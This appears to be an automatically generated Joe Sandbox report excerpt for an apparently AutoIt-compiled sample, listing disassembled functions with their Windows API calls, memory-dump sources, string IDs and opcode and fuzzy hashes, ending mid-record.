                                    • Opcode ID: 1db144f43b24bd0ab1a5a08ae3dd899e30737c077f01cc459f629284cc8a93f1
                                    • Instruction ID: 637874e353f9bcb13119fd88056ebf5aef8134a8874f01a56e41e24462acb3d7
                                    • Opcode Fuzzy Hash: 1db144f43b24bd0ab1a5a08ae3dd899e30737c077f01cc459f629284cc8a93f1
                                    • Instruction Fuzzy Hash: 0D016931440215FFEB515FA4DC08BEA7FBAFF04321F618169FA16A22A1DB351E51EB50
                                    Function 007E1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007E187F
                                    • UnloadUserProfile.USERENV(?,?), ref: 007E188B
                                    • CloseHandle.KERNEL32(?), ref: 007E1894
                                    • CloseHandle.KERNEL32(?), ref: 007E189C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E18A5
                                    • HeapFree.KERNEL32(00000000), ref: 007E18AC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                    • String ID:
                                    • API String ID: 146765662-0
                                    • Opcode ID: e88199ca09dffe17241728a6e194341b1d05a6436b0420327fa6c3d7b125f7ca
                                    • Instruction ID: 0f7053261804d1aca69a8d217167651c53ec18b5632d6144a04b689877fe2748
                                    • Opcode Fuzzy Hash: e88199ca09dffe17241728a6e194341b1d05a6436b0420327fa6c3d7b125f7ca
                                    • Instruction Fuzzy Hash: A0E0E536484211BBDB015FA5ED0C98AFF3EFF49B22B10C620F225811B0CB729420DF50
                                    Function 00807B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007A0242: EnterCriticalSection.KERNEL32(0085070C,00851884,?,?,0079198B,00852518,?,?,?,007812F9,00000000), ref: 007A024D
                                      • Part of subcall function 007A0242: LeaveCriticalSection.KERNEL32(0085070C,?,0079198B,00852518,?,?,?,007812F9,00000000), ref: 007A028A
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007A00A3: __onexit.LIBCMT ref: 007A00A9
                                    • __Init_thread_footer.LIBCMT ref: 00807BFB
                                      • Part of subcall function 007A01F8: EnterCriticalSection.KERNEL32(0085070C,?,?,00798747,00852514), ref: 007A0202
                                      • Part of subcall function 007A01F8: LeaveCriticalSection.KERNEL32(0085070C,?,00798747,00852514), ref: 007A0235
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                    • String ID: +T}$5$G$Variable must be of type 'Object'.
                                    • API String ID: 535116098-1770635527
                                    • Opcode ID: 401dd77fa7a70495e2296030cd19cfda737dc0792e272fa2059512c18efd72eb
                                    • Instruction ID: 5f8363072354253fde8732fe9dedc6346d8db33829732c5f37a0d08ce17d2c09
                                    • Opcode Fuzzy Hash: 401dd77fa7a70495e2296030cd19cfda737dc0792e272fa2059512c18efd72eb
                                    • Instruction Fuzzy Hash: D9919C70A04209EFCB54EF98D8959BDB7B1FF49304F148049F8069B292DB35AE45CB61
                                    Function 007EC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00787620: _wcslen.LIBCMT ref: 00787625
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007EC6EE
                                    • _wcslen.LIBCMT ref: 007EC735
                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007EC79C
                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007EC7CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info_wcslen$Default
                                    • String ID: 0
                                    • API String ID: 1227352736-4108050209
                                    • Opcode ID: 4aab43c6cc36530ce582ba5c41a2235678f3e67de71dd4e5443487caabd288b0
                                    • Instruction ID: 509410470a1e7eaa39ffd5020c65a1e3bd3c6ac946806fb7963e9aa63f4d2568
                                    • Opcode Fuzzy Hash: 4aab43c6cc36530ce582ba5c41a2235678f3e67de71dd4e5443487caabd288b0
                                    • Instruction Fuzzy Hash: 6751F5756063809BD7129F2AC889B6B7BE8EF4D310F040A2DF995D3190DB78DC06CB52
                                    Function 0080AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0080AEA3
                                      • Part of subcall function 00787620: _wcslen.LIBCMT ref: 00787625
                                    • GetProcessId.KERNEL32(00000000), ref: 0080AF38
                                    • CloseHandle.KERNEL32(00000000), ref: 0080AF67
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseExecuteHandleProcessShell_wcslen
                                    • String ID: <$@
                                    • API String ID: 146682121-1426351568
                                    • Opcode ID: 7e5128f519c30ffa695d0e9fbc8d4b0a7f837651bb726d9e5bc21e10bf440f60
                                    • Instruction ID: 469af3aaacb2ed6b7cab7ec1674c3ef6c9bcf7e277651d8c6b5e57ee59ca2c29
                                    • Opcode Fuzzy Hash: 7e5128f519c30ffa695d0e9fbc8d4b0a7f837651bb726d9e5bc21e10bf440f60
                                    • Instruction Fuzzy Hash: D5718D75A00619DFCB18EF54C888A9EBBF0FF08314F148499E816AB392CB74ED41CB91
                                    Function 007E719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007E7206
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007E723C
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007E724D
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007E72CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: 4a98c7f0b4897195c14c70c2f6ae250ab42a4d4e4a843cc60b7e3df02b15f736
                                    • Instruction ID: 2a0a03627789c6abb4abe645ffdcddc75426e8714111c7a51c5d57049ad11427
                                    • Opcode Fuzzy Hash: 4a98c7f0b4897195c14c70c2f6ae250ab42a4d4e4a843cc60b7e3df02b15f736
                                    • Instruction Fuzzy Hash: 08418F71605245EFDB19CF55C884A9A7BBDFF49310F1480A9BE05DF20AD7B8D944CBA0
                                    Function 00813D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00813E35
                                    • IsMenu.USER32(?), ref: 00813E4A
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00813E92
                                    • DrawMenuBar.USER32 ref: 00813EA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Menu$Item$DrawInfoInsert
                                    • String ID: 0
                                    • API String ID: 3076010158-4108050209
                                    • Opcode ID: ac1c75919fe4e0681924431417488b0feee7e6050ca18d8990ee0c1465e6d2dd
                                    • Instruction ID: 13493073faa80ea388fae3745d7e76e76c387f5544d20427eea838dd4f083399
                                    • Opcode Fuzzy Hash: ac1c75919fe4e0681924431417488b0feee7e6050ca18d8990ee0c1465e6d2dd
                                    • Instruction Fuzzy Hash: D1413675A00309EFDF10DF50D884AEABBB9FF49354F048129E905E7690D734AE84CB50
                                    Function 007E1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 007E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 007E3CCA
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007E1E66
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007E1E79
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 007E1EA9
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$_wcslen$ClassName
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 2081771294-1403004172
                                    • Opcode ID: 0aacd2984041e383a27a20d773c3f8b8f402da36c096a7835ffcc673d9efb1fe
                                    • Instruction ID: f2260038ea7f3f6eeffa3006144077bd3afff2dd12b17a0b9d9ebd9e79443119
                                    • Opcode Fuzzy Hash: 0aacd2984041e383a27a20d773c3f8b8f402da36c096a7835ffcc673d9efb1fe
                                    • Instruction Fuzzy Hash: 832123B1A41144BFDB14AB71DC4ACFFB7B8EF49360B584119F821A32E1DB3C49098720
                                    Function 0080C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: HKEY_LOCAL_MACHINE$HKLM
                                    • API String ID: 176396367-4004644295
                                    • Opcode ID: 96bed2c23a6a4fe40ce0caed994bc23b3d1ee9c6795c9cf4c75be76fa969677f
                                    • Instruction ID: d997677222557fb0b19baac5903f75a444713f62c52844e426e7bdb4dd371860
                                    • Opcode Fuzzy Hash: 96bed2c23a6a4fe40ce0caed994bc23b3d1ee9c6795c9cf4c75be76fa969677f
                                    • Instruction Fuzzy Hash: BC31D5B2B0017A8BCB60EF6C9C505BF3392FBA1750B154229E855EB3C5E675CD4493A0
                                    Function 00812F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00812F8D
                                    • LoadLibraryW.KERNEL32(?), ref: 00812F94
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00812FA9
                                    • DestroyWindow.USER32(?), ref: 00812FB1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                    • String ID: SysAnimate32
                                    • API String ID: 3529120543-1011021900
                                    • Opcode ID: 7227c5afffd75f203beedf7d93ccf037f220eabfe839b628becfe4163bbca86c
                                    • Instruction ID: e66713e23c48dcfc06bef76b460a894e2f24c287fe5f47ed47925b987a54eaf8
                                    • Opcode Fuzzy Hash: 7227c5afffd75f203beedf7d93ccf037f220eabfe839b628becfe4163bbca86c
                                    • Instruction Fuzzy Hash: A7218C71204209ABEB205F64EC84EFB77BDFF59364F104628F950D6190DB71DCA29760
                                    Function 007A4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007A4D1E,007B28E9,?,007A4CBE,007B28E9,008488B8,0000000C,007A4E15,007B28E9,00000002), ref: 007A4D8D
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007A4DA0
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,007A4D1E,007B28E9,?,007A4CBE,007B28E9,008488B8,0000000C,007A4E15,007B28E9,00000002,00000000), ref: 007A4DC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 49af808fd980322f55b8d1c0d61c994908ada7f0f43d3582b03ccf96f259fd97
                                    • Instruction ID: 7307611f725bcf31f8de5b9a717cf709e42e3bf4b73647f585530c2873cb79d8
                                    • Opcode Fuzzy Hash: 49af808fd980322f55b8d1c0d61c994908ada7f0f43d3582b03ccf96f259fd97
                                    • Instruction Fuzzy Hash: 90F04F35A80218FBDB519F94DC49BEDBBB9FF85752F0041A4F905A2260CB769980CA90
                                    Function 00784E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00784EDD,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E9C
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00784EAE
                                    • FreeLibrary.KERNEL32(00000000,?,?,00784EDD,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784EC0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 145871493-3689287502
                                    • Opcode ID: f1d4853c8fd0b67d49f198601f7e21c4d6ca5f4d5ad6191ba7cb682e73bbe8a5
                                    • Instruction ID: 64148aedb5824c8a6e569a1eb31f1e29263caecba9dbe066cb3c9cd98ff3cd20
                                    • Opcode Fuzzy Hash: f1d4853c8fd0b67d49f198601f7e21c4d6ca5f4d5ad6191ba7cb682e73bbe8a5
                                    • Instruction Fuzzy Hash: D2E0C236AC2623BBD3322F25AC18BAF765CFF81F72B054115FC00E2200DBA8CD0182A0
                                    Function 00784E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,007C3CDE,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E62
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00784E74
                                    • FreeLibrary.KERNEL32(00000000,?,?,007C3CDE,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 145871493-1355242751
                                    • Opcode ID: 9f7a2a33b4e93e7caed15de2bea669a18eae59591d37f387e9d9c6bc892cdfb9
                                    • Instruction ID: 741a642a4b7609804bb098e5f3ab4f9f2b16d3b3628f1d5bdd2c030c5409d7fd
                                    • Opcode Fuzzy Hash: 9f7a2a33b4e93e7caed15de2bea669a18eae59591d37f387e9d9c6bc892cdfb9
                                    • Instruction Fuzzy Hash: 46D012355C26626756222B256C18DCB7A1CFF85B653054515B905E2214CFA8CD0186D0
                                    Function 0080A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 0080A427
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0080A435
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0080A468
                                    • CloseHandle.KERNEL32(?), ref: 0080A63D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                    • String ID:
                                    • API String ID: 3488606520-0
                                    • Opcode ID: 04b3fe824898dafa1ab9cca7233f0ac4b33ac22d45b9641ab1119f7d911c65e6
                                    • Instruction ID: 1ac895a8a99b9891e1e23486e7a9e864079dfccdd7d43e04c616228a81110916
                                    • Opcode Fuzzy Hash: 04b3fe824898dafa1ab9cca7233f0ac4b33ac22d45b9641ab1119f7d911c65e6
                                    • Instruction Fuzzy Hash: 58A19E71644300AFE724EF24D886B2AB7E5BF84714F14881CF55ADB2D2D7B5EC418B92
                                    Function 007EE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007ECF22,?), ref: 007EDDFD
                                      • Part of subcall function 007EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007ECF22,?), ref: 007EDE16
                                      • Part of subcall function 007EE199: GetFileAttributesW.KERNEL32(?,007ECF95), ref: 007EE19A
                                    • lstrcmpiW.KERNEL32(?,?), ref: 007EE473
                                    • MoveFileW.KERNEL32(?,?), ref: 007EE4AC
                                    • _wcslen.LIBCMT ref: 007EE5EB
                                    • _wcslen.LIBCMT ref: 007EE603
                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 007EE650
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                    • String ID:
                                    • API String ID: 3183298772-0
                                    • Opcode ID: 8658f4614ea62c9e4b5a214f12aa45d0e1429282f36bff2b2b4aa1dc8973b403
                                    • Instruction ID: 19fb98bff7bc43e745b335bb1dfb2657747cea17d7d6296a79f0e1ae8e6c95c6
                                    • Opcode Fuzzy Hash: 8658f4614ea62c9e4b5a214f12aa45d0e1429282f36bff2b2b4aa1dc8973b403
                                    • Instruction Fuzzy Hash: 965165B24093859BC724EB94DC859DFB3ECAF89340F004D1EF689D3191EF79A5888766
                                    Function 0080B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 0080C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0080B6AE,?,?), ref: 0080C9B5
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080C9F1
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA68
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0080BAA5
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0080BB00
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0080BB63
                                    • RegCloseKey.ADVAPI32(?,?), ref: 0080BBA6
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0080BBB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
